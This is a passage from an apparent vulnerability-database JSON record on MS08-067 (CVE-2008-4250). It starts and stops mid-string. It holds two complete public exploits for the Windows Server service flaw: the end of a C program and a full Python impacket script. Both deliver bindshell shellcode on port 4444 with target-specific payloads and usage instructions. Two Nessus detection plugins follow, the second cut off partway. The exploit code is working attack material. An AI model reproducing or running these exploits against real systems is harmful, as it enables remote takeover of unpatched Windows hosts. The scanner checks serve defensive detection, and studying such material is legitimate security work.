fa\\xf8\\x30\\x1a\\xf9\\x53\\xb3\\xb5\\x7d\\x94\\x8e\\xad\\xd4\\xc1\\x9f\\x1d\"\r\n\"\\x52\\xd1\\xb3\\xb5\\x7d\\x61\\x8c\\x2e\\xcb\\x6f\\x85\\x27\\x24\\xe2\\x8c\\x1a\"\r\n\"\\xf4\\x2e\\x2a\\xc3\\x4a\\x6d\\xa2\\xc3\\x4f\\x36\\x26\\xb9\\x07\\xf9\\xa4\\x67\"\r\n\"\\x53\\x45\\xca\\xd9\\x20\\x7d\\xde\\xe1\\x06\\xac\\x8e\\x38\\x53\\xb4\\xf0\\xb5\"\r\n\"\\xd8\\x43\\x19\\x9c\\xf6\\x50\\xb4\\x1b\\xfc\\x56\\x8c\\x4b\\xfc\\x56\\xb3\\x1b\"\r\n\"\\x52\\xd7\\x8e\\xe7\\x74\\x02\\x28\\x19\\x52\\xd1\\x8c\\xb5\\x52\\x30\\x19\\x9a\"\r\n\"\\x26\\x50\\x1a\\xc9\\x69\\x63\\x19\\x9c\\xff\\xf8\\x36\\x22\\x42\\xc9\\x06\\x2a\"\r\n\"\\xfe\\xf8\\x30\\xb5\\x7d\\x07\\xe6\\x4a\";\r\n\r\nint BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer) \r\n{\r\n\tBYTE rbuf[0x1000]=\"\";\r\n\tDWORD dw=0;\r\n\tstruct RPCBIND RPCBind;\r\n\r\n\tmemcpy(&RPCBind,&PRPC,sizeof(RPCBind));\r\n\tUuidFromString((unsigned char *)Interface,&RPCBind.InterfaceUUID);\r\n\tUuidToString(&RPCBind.InterfaceUUID,(unsigned char **)&Interface);\r\n\tRPCBind.InterfaceVerMaj=atoi(&InterfaceVer[0]);\r\n\tRPCBind.InterfaceVerMin=atoi(&InterfaceVer[2]);\r\n\tTransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf,sizeof(rbuf), &dw, NULL);\r\n\r\n\treturn 0;\r\n}\r\n\r\nint main(int argc, char* argv[])\r\n{\r\n\tchar *server;\r\n\tNETRESOURCE nr;\r\n\tchar unc[MAX_PATH];\r\n\tchar szPipe[MAX_PATH];\r\n\tHANDLE hFile;\r\n\tWSADATA wsa;\r\n\r\n\tint bwritten=0;\r\n\tBYTE rbuf[0x100]=\"\";\r\n\tDWORD dw;\r\n\tPVOID\tptr = (PVOID)&POP;\r\n\r\n\tprintf( \"\\tMS08-067 Remote Stack Overflow Vulnerability Exploit(POC)\\n\\n\" );\r\n\tprintf( \"Create by Whitecell's Polymorphours@whitecell.org 2008/10/27\\n\" );\r\n\tprintf( \"Thanks isno and PolyMeta\\n\" );\r\n\tprintf( \"ShellCode Function: bindshell port:4444\\n\" );\r\n\tprintf( \"usage:\\n%s [IP]\\n\", argv[0] );\r\n\r\n\tif ( argc != 2 ) {\r\n\t\r\n\t\treturn 0;\r\n\t}\r\n\r\n\tif ( WSAStartup(MAKEWORD(2,2),&wsa) != 0 ) {\r\n\t\r\n\t\tprintf( \"WSAStartup failed\\n\" );\r\n\t\treturn 0;\r\n\t}\r\n\r\n\tmemcpy((char *)ptr + 74, bind_shellcode, sizeof(bind_shellcode)-1);\r\n\r\n\tserver=argv[1];\r\n\t_snprintf(unc, sizeof(unc), \"\\\\\\\\%s\\\\pipe\", server);\r\n\tunc[sizeof(unc)-1] = 0;\r\n\tnr.dwType = RESOURCETYPE_ANY;\r\n\tnr.lpLocalName = NULL;\r\n\tnr.lpRemoteName = unc;\r\n\tnr.lpProvider = NULL;\r\n\r\n\tprintf( \"connect %s ipc$ .... \", server );\r\n\r\n\tif ( WNetAddConnection2(&nr, \"\", \"\", 0) != 0 ) {\r\n\t\r\n\t\tprintf( \"failed\\n\" );\r\n\t\treturn 0;\r\n\t} else {\r\n\t\r\n\t\tprintf( \"success!\\n\" );\r\n\t}\r\n\r\n\t_snprintf(szPipe, sizeof(szPipe),\"\\\\\\\\%s\\\\pipe\\\\browser\",server);\r\n\tprintf( \"open \\\\\\\\%s\\\\pipe\\\\browser ....\", server );\r\n\thFile = CreateFile( szPipe, \r\n\t\t\t\t\t\tGENERIC_READ|GENERIC_WRITE, \r\n\t\t\t\t\t\t0, \r\n\t\t\t\t\t\tNULL,\r\n\t\t\t\t\t\tOPEN_EXISTING, 0, NULL);\r\n\tif ( hFile == (HANDLE)-1 ) {\r\n\t\r\n\t\tprintf( \"failed!\\n\" );\r\n\t\treturn 0;\r\n\t} else {\r\n\t\r\n\t\tprintf( \"success!\\n\" );\r\n\t}\r\n\r\n\tprintf( \"Bind Rpc 4b324fc8-1670-01d3-1278-5a47bf6ee188 Interface\\n\" );\r\n\tBindRpcInterface(hFile,\"4b324fc8-1670-01d3-1278-5a47bf6ee188\",\"3.0\");\r\n\r\n\tprintf( \"Send shellcode ....\\n\" );\r\n\tTransactNamedPipe(hFile, (PVOID)&POP, sizeof(POP) - 1, rbuf, sizeof(rbuf), &dw, NULL);\r\n\r\n\tprintf( \"Send Exploit ...... \\n\" );\r\n\tTransactNamedPipe(hFile, (PVOID)&EXPLOIT, sizeof(EXPLOIT) - 1, rbuf, sizeof(rbuf), &dw, NULL);\r\n\r\n\tCloseHandle( hFile );\r\n\r\n\treturn 0;\r\n}\r\n\r\n// milw0rm.com [2008-11-12]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/7104/"}, {"lastseen": "2016-02-01T01:28:54", "bulletinFamily": "exploit", "description": "MS Windows Server Service Code Execution Exploit (MS08-067) (2k/2k3). CVE-2008-4250. Remote exploit for windows platform", "modified": "2008-11-16T00:00:00", "published": "2008-11-16T00:00:00", "id": "EDB-ID:7132", "href": "https://www.exploit-db.com/exploits/7132/", "type": "exploitdb", "title": "Microsoft Windows Server 2000/2003 - Code Execution Exploit MS08-067", "sourceData": "#!/usr/bin/env python\r\n#############################################################################\r\n# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)\r\n# www.hackingspirits.com\r\n# www.coffeeandsecurity.com\r\n# Email: d3basis.m0hanty @ gmail.com\r\n#############################################################################\r\n\r\nimport struct\r\nimport sys\r\n\r\nfrom threading import Thread #Thread is imported incase you would like to modify\r\n #the src to run against multiple targets.\r\n\r\ntry:\r\n from impacket import smb\r\n from impacket import uuid\r\n from impacket.dcerpc import dcerpc\r\n from impacket.dcerpc import transport\r\nexcept ImportError, _:\r\n print 'Install the following library to make this script work'\r\n print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'\r\n print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'\r\n sys.exit(1)\r\n\r\n\r\nprint '#######################################################################'\r\nprint '# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)'\r\nprint '# www.hackingspirits.com'\r\nprint '# www.coffeeandsecurity.com'\r\nprint '# Email: d3basis.m0hanty @ gmail.com'\r\nprint '#######################################################################\\n'\r\n\r\n\r\n#Portbind shellcode from metasploit; Binds port to TCP port 4444\r\nshellcode = \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\nshellcode += \"\\x29\\xc9\\x83\\xe9\\xb0\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e\\xe9\"\r\nshellcode += \"\\x4a\\xb6\\xa9\\x83\\xee\\xfc\\xe2\\xf4\\x15\\x20\\x5d\\xe4\\x01\\xb3\\x49\\x56\"\r\nshellcode += \"\\x16\\x2a\\x3d\\xc5\\xcd\\x6e\\x3d\\xec\\xd5\\xc1\\xca\\xac\\x91\\x4b\\x59\\x22\"\r\nshellcode += \"\\xa6\\x52\\x3d\\xf6\\xc9\\x4b\\x5d\\xe0\\x62\\x7e\\x3d\\xa8\\x07\\x7b\\x76\\x30\"\r\nshellcode += \"\\x45\\xce\\x76\\xdd\\xee\\x8b\\x7c\\xa4\\xe8\\x88\\x5d\\x5d\\xd2\\x1e\\x92\\x81\"\r\nshellcode += \"\\x9c\\xaf\\x3d\\xf6\\xcd\\x4b\\x5d\\xcf\\x62\\x46\\xfd\\x22\\xb6\\x56\\xb7\\x42\"\r\nshellcode += \"\\xea\\x66\\x3d\\x20\\x85\\x6e\\xaa\\xc8\\x2a\\x7b\\x6d\\xcd\\x62\\x09\\x86\\x22\"\r\nshellcode += \"\\xa9\\x46\\x3d\\xd9\\xf5\\xe7\\x3d\\xe9\\xe1\\x14\\xde\\x27\\xa7\\x44\\x5a\\xf9\"\r\nshellcode += \"\\x16\\x9c\\xd0\\xfa\\x8f\\x22\\x85\\x9b\\x81\\x3d\\xc5\\x9b\\xb6\\x1e\\x49\\x79\"\r\nshellcode += \"\\x81\\x81\\x5b\\x55\\xd2\\x1a\\x49\\x7f\\xb6\\xc3\\x53\\xcf\\x68\\xa7\\xbe\\xab\"\r\nshellcode += \"\\xbc\\x20\\xb4\\x56\\x39\\x22\\x6f\\xa0\\x1c\\xe7\\xe1\\x56\\x3f\\x19\\xe5\\xfa\"\r\nshellcode += \"\\xba\\x19\\xf5\\xfa\\xaa\\x19\\x49\\x79\\x8f\\x22\\xa7\\xf5\\x8f\\x19\\x3f\\x48\"\r\nshellcode += \"\\x7c\\x22\\x12\\xb3\\x99\\x8d\\xe1\\x56\\x3f\\x20\\xa6\\xf8\\xbc\\xb5\\x66\\xc1\"\r\nshellcode += \"\\x4d\\xe7\\x98\\x40\\xbe\\xb5\\x60\\xfa\\xbc\\xb5\\x66\\xc1\\x0c\\x03\\x30\\xe0\"\r\nshellcode += \"\\xbe\\xb5\\x60\\xf9\\xbd\\x1e\\xe3\\x56\\x39\\xd9\\xde\\x4e\\x90\\x8c\\xcf\\xfe\"\r\nshellcode += \"\\x16\\x9c\\xe3\\x56\\x39\\x2c\\xdc\\xcd\\x8f\\x22\\xd5\\xc4\\x60\\xaf\\xdc\\xf9\"\r\nshellcode += \"\\xb0\\x63\\x7a\\x20\\x0e\\x20\\xf2\\x20\\x0b\\x7b\\x76\\x5a\\x43\\xb4\\xf4\\x84\"\r\nshellcode += \"\\x17\\x08\\x9a\\x3a\\x64\\x30\\x8e\\x02\\x42\\xe1\\xde\\xdb\\x17\\xf9\\xa0\\x56\"\r\nshellcode += \"\\x9c\\x0e\\x49\\x7f\\xb2\\x1d\\xe4\\xf8\\xb8\\x1b\\xdc\\xa8\\xb8\\x1b\\xe3\\xf8\"\r\nshellcode += \"\\x16\\x9a\\xde\\x04\\x30\\x4f\\x78\\xfa\\x16\\x9c\\xdc\\x56\\x16\\x7d\\x49\\x79\"\r\nshellcode += \"\\x62\\x1d\\x4a\\x2a\\x2d\\x2e\\x49\\x7f\\xbb\\xb5\\x66\\xc1\\x19\\xc0\\xb2\\xf6\"\r\nshellcode += \"\\xba\\xb5\\x60\\x56\\x39\\x4a\\xb6\\xa9\"\r\n\r\n\r\n#Payload for Windows 2000 target\r\npayload_1='\\x41\\x00\\x5c\\x00\\x2e\\x00\\x2e\\x00\\x5c\\x00\\x2e\\x00\\x2e\\x00\\x5c\\x00'\r\npayload_1+='\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41'\r\npayload_1+='\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41'\r\npayload_1+='\\x41\\x41'\r\npayload_1+='\\x2f\\x68\\x18\\x00\\x8b\\xc4\\x66\\x05\\x94\\x04\\x8b\\x00\\xff\\xe0'\r\npayload_1+='\\x43\\x43\\x43\\x43\\x43\\x43\\x43\\x43'\r\npayload_1+='\\x43\\x43\\x43\\x43\\x43\\x43\\x43\\x43'\r\npayload_1+='\\x43\\x43\\x43\\x43\\x43\\x43\\x43\\x43'\r\npayload_1+='\\x43\\x43\\x43\\x43\\x43\\x43\\x43\\x43'\r\npayload_1+='\\x43\\x43\\x43\\x43\\x43\\x43\\x43\\x43'\r\npayload_1+='\\xeb\\xcc'\r\npayload_1+='\\x00\\x00'\r\n\r\n#Payload for Windows 2003[SP2] target\r\npayload_2='\\x41\\x00\\x5c\\x00'\r\npayload_2+='\\x2e\\x00\\x2e\\x00\\x5c\\x00\\x2e\\x00'\r\npayload_2+='\\x2e\\x00\\x5c\\x00\\x0a\\x32\\xbb\\x77'\r\npayload_2+='\\x8b\\xc4\\x66\\x05\\x60\\x04\\x8b\\x00'\r\npayload_2+='\\x50\\xff\\xd6\\xff\\xe0\\x42\\x84\\xae'\r\npayload_2+='\\xbb\\x77\\xff\\xff\\xff\\xff\\x01\\x00'\r\npayload_2+='\\x01\\x00\\x01\\x00\\x01\\x00\\x43\\x43'\r\npayload_2+='\\x43\\x43\\x37\\x48\\xbb\\x77\\xf5\\xff'\r\npayload_2+='\\xff\\xff\\xd1\\x29\\xbc\\x77\\xf4\\x75'\r\npayload_2+='\\xbd\\x77\\x44\\x44\\x44\\x44\\x9e\\xf5'\r\npayload_2+='\\xbb\\x77\\x54\\x13\\xbf\\x77\\x37\\xc6'\r\npayload_2+='\\xba\\x77\\xf9\\x75\\xbd\\x77\\x00\\x00'\r\n\r\n\r\nif sys.argv[2]=='1': #Windows 2000 Payload\r\n payload=payload_1\r\n print '[-]Windows 2000 payload loaded'\r\nif sys.argv[2]=='2': #Windows 2003[SP2] Payload\r\n payload=payload_2\r\n print '[-]Windows 2003[SP2] payload loaded'\r\n\r\n\r\nclass SRVSVC_Exploit(Thread):\r\n def __init__(self, target, osver, port=445):\r\n super(SRVSVC_Exploit, self).__init__()\r\n self.__port = port\r\n self.target = target\r\n self.osver = osver\r\n\r\n def __DCEPacket(self):\r\n print '[-]Initiating connection'\r\n self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\\\pipe\\\\browser]' % self.target)\r\n self.__trans.connect()\r\n print '[-]connected to ncacn_np:%s[\\\\pipe\\\\browser]' % self.target\r\n self.__dce = self.__trans.DCERPC_class(self.__trans)\r\n self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))\r\n \r\n # Constructing Malicious Packet\r\n self.__stub='\\x01\\x00\\x00\\x00'\r\n self.__stub+='\\xd6\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd6\\x00\\x00\\x00'\r\n self.__stub+=shellcode\r\n self.__stub+='\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41'\r\n self.__stub+='\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41'\r\n self.__stub+='\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41'\r\n self.__stub+='\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41'\r\n self.__stub+='\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41'\r\n self.__stub+='\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41'\r\n self.__stub+='\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41'\r\n self.__stub+='\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41'\r\n self.__stub+='\\x00\\x00\\x00\\x00'\r\n self.__stub+='\\x2f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x2f\\x00\\x00\\x00'\r\n self.__stub+=payload\r\n self.__stub+='\\x00\\x00\\x00\\x00'\r\n self.__stub+='\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00'\r\n self.__stub+='\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00'\r\n self.__stub+='\\x5c\\x00\\x00\\x00\\x01\\x00\\x00\\x00'\r\n self.__stub+='\\x01\\x00\\x00\\x00'\r\n return\r\n\r\n def run(self):\r\n self.__DCEPacket()\r\n self.__dce.call(0x1f, self.__stub) #0x1f (or 31)- NetPathCanonicalize Operation\r\n print '[-]Exploit sent to target successfully...\\n[1]Telnet to port 4444 on target machine...'\r\n\r\nif __name__ == '__main__':\r\n try:\r\n target = sys.argv[1]\r\n osver = sys.argv[2]\r\n except IndexError:\r\n print '\\nUsage: %s <target ip> <os version>\\n' % sys.argv[0]\r\n print 'Example: srvsvcexpl.py 192.168.1.1 2\\n'\r\n print 'Select OS Version'\r\n print '[-]Windows 2000: OS Version = 1'\r\n print '[-]Windows 2003[SP2]: OS Version = 2'\r\n\r\n sys.exit(-1)\r\n\r\ncurrent = SRVSVC_Exploit(target, osver)\r\ncurrent.start()\r\n#print '[-]Exploit sent to target successfully...\\n[-]Telnet to port 4444 on target machine...'\r\n\r\n# milw0rm.com [2008-11-16]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/7132/"}], "nessus": [{"lastseen": "2019-11-03T12:15:44", "bulletinFamily": "scanner", "description": "The remote Windows host is affected by a remote code execution\nvulnerability in the ", "modified": "2019-11-02T00:00:00", "id": "SMB_NT_MS08-067.NASL", "href": "https://www.tenable.com/plugins/nessus/34476", "published": "2008-10-23T00:00:00", "title": "MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Unspecified Remote Code Execution (958644) (ECLIPSEDWING)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34476);\n script_version(\"1.37\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\"CVE-2008-4250\");\n script_bugtraq_id(31874);\n script_xref(name:\"CERT\", value:\"827267\");\n script_xref(name:\"EDB-ID\", value:\"6824\");\n script_xref(name:\"EDB-ID\", value:\"7104\");\n script_xref(name:\"EDB-ID\", value:\"7132\");\n script_xref(name:\"MSFT\", value:\"MS08-067\");\n script_xref(name:\"MSKB\", value:\"958644\");\n script_xref(name:\"IAVA\", value:\"2008-A-0081\");\n\n script_name(english:\"MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Unspecified Remote Code Execution (958644) (ECLIPSEDWING)\");\n script_summary(english:\"Determines the presence of update 958644.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by a remote code execution\nvulnerability in the 'Server' service due to improper handling of RPC\nrequests. An unauthenticated, remote attacker can exploit this, via a\nspecially crafted RPC request, to execute arbitrary code with 'System'\nprivileges.\n\nECLIPSEDWING is one of multiple Equation Group vulnerabilities and\nexploits disclosed on 2017/04/14 by a group known as the Shadow\nBrokers.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/ms08-067\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2000, XP, 2003,\nVista and 2008.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS08-067 Microsoft Server Service Relative Path Stack Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/10/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS08-067';\nkb = '958644';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win2k:'4,5', xp:'2,3', win2003:'1,2', vista:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"Netapi32.dll\", version:\"6.0.6001.22288\", min_version:\"6.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"Netapi32.dll\", version:\"6.0.6001.18157\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:0, file:\"Netapi32.dll\", version:\"6.0.6000.20937\", min_version:\"6.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:0, file:\"Netapi32.dll\", version:\"6.0.6000.16764\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Netapi32.dll\", version:\"5.2.3790.4392\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:1, file:\"Netapi32.dll\", version:\"5.2.3790.3229\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Netapi32.dll\", version:\"5.1.2600.5694\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:2, file:\"Netapi32.dll\", version:\"5.1.2600.3462\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n hotfix_is_vulnerable(os:\"5.0\", file:\"Netapi32.dll\", version:\"5.0.2195.7203\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:15:42", "bulletinFamily": "scanner", "description": "The remote Windows host is affected by a remote code execution\nvulnerability in the ", "modified": "2019-11-02T00:00:00", "id": "SMB_KB958644.NASL", "href": "https://www.tenable.com/plugins/nessus/34477", "published": "2008-10-23T00:00:00", "title": "MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (ECLIPSEDWING) (uncredentialed check)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34477);\n script_version(\"1.52\");\n script_cvs_date(\"Date: 2018/11/16 13:31:48\");\n\n script_cve_id(\"CVE-2008-4250\");\n script_bugtraq_id(31874);\n script_xref(name:\"MSFT\", value:\"MS08-067\");\n script_xref(name:\"CERT\", value:\"827267\");\n script_xref(name:\"IAVA\", value:\"2008-A-0081\");\n script_xref(name:\"EDB-ID\", value:\"6824\");\n script_xref(name:\"EDB-ID\", value:\"7104\");\n script_xref(name:\"EDB-ID\", value:\"7132\");\n script_xref(name:\"MSKB\", value:\"958644\");\n\n script_name(english:\"MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (ECLIPSEDWING) (uncredentialed check)\");\n script_summary(english:\"Determines the presence of update 958644.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by a remote code execution\nvulnerability in the 'Server' service due to improper handling of RPC\nrequests. An unauthenticated, remote attacker can exploit this, via a\nspecially crafted RPC request, to execute arbitrary code with 'System'\nprivileges.\n\nECLIPSEDWING is one of multiple Equation Group vulnerabilities and\nexploits disclosed on 2017/04/14 by a group known as the Shadow\nBrokers.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/ms08-067\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2000, XP, 2003,\nVista and 2008.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\nscript_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2008-4250\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS08-067 Microsoft Server Service Relative Path Stack Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/10/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Windows\");\n\n script_dependencies(\"smb_nativelanman.nasl\",\"smb_login.nasl\");\n if ( NASL_LEVEL >= 3200 )\n script_dependencies(\"smb_kb958644_ips.nbin\");\n script_require_keys(\"Host/OS/smb\");\n script_exclude_keys(\"SMB/Missing/MS08-067\");\n script_require_ports(139, 445);\n exit(0);\n}\n\n#\n\ninclude ('smb_func.inc');\n\nif ( get_kb_item(\"SMB/KB958644/34821/Vulnerable\") ) security_hole(kb_smb_transport());\nif ( get_kb_item(\"SMB/KB958644/34821\") ) exit(0);\nif ( get_kb_item(\"SMB/Missing/MS08-067\") ) exit(0);\n\nfunction NetPathCanonicalize ()\n{\n local_var data, data2, fid, fid2, rep, ret;\n\n fid = bind_pipe (pipe:\"\\browser\", uuid:\"4b324fc8-1670-01d3-1278-5a47bf6ee188\", vers:3);\n if (isnull (fid))\n return 0;\n\n fid2 = bind_pipe (pipe:\"\\browser\", uuid:\"6bffd098-a112-3610-9833-46c3f87e345a\", vers:1);\n if (isnull (fid2))\n return 0;\n\n data2 = class_parameter (name:\"\", ref_id:0x20000) +\n class_name (name:crap(data:\"\\A\", length:0x100)) +\n\traw_dword (d:0) ;\n\n data = class_parameter (name:\"\", ref_id:0x20000) +\n class_name (name:\"\\\" + crap(data:\"A\", length:0x23) + \"\\..\\nessus\") +\n\tclass_name (name:\"\\nessus\") +\n\traw_dword (d:1) +\n\traw_dword (d:0) ;\n\n data2 = dce_rpc_pipe_request (fid:fid2, code:0x0A, data:data2);\n if (!data2)\n return 0;\n\n data = dce_rpc_pipe_request (fid:fid, code:0x20, data:data);\n if (!data)\n return 0;\n\n\n rep = dce_rpc_parse_response (fid:fid, data:data);\n if (!rep || (strlen(rep) != 4))\n return 0;\n\n ret = get_dword (blob:rep, pos:strlen(rep)-4);\n if (ret == 0)\n return 1;\n\n return 0;\n}\n\nos = get_kb_item (\"Host/OS/smb\") ;\nif (\"Windows\" >!< os) exit(0);\n\nname\t= kb_smb_name();\nport\t= kb_smb_transport();\n\nif ( ! get_port_state(port) ) exit(0);\nsoc = open_sock_tcp(port);\nif ( ! soc ) exit(0);\n\nsession_init(socket:soc, hostname:name);\n\nr = NetUseAdd(share:\"IPC$\");\nif ( r == 1 )\n{\n ret = NetPathCanonicalize ();\n if 